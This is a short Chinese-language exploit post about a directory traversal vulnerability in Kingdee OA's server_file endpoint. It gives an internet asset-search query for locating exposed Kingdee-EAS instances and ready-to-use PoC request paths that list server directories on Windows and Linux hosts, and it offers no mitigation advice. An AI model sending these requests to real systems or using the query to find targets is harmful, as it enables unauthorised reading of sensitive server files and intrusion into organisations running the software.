金蝶OA server_file 目录遍历漏洞

漏洞描述

金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息。

漏洞影响

金蝶OA

网络测绘

app=”Kingdee-EAS”

漏洞复现

登录界面为

20240309184610851-image-20210603132948792.a18c46ec_2024-03-09_18-45-45

漏洞POC

/appmonitor/protected/selector/server_file/files?folder=/&suffix=
Windows服务器

appmonitor/protected/selector/server_file/files?folder=C://&suffix=

Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=

20240309184659886-image-20210603133136331.8ebd3623_2024-03-09_18-46-41

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容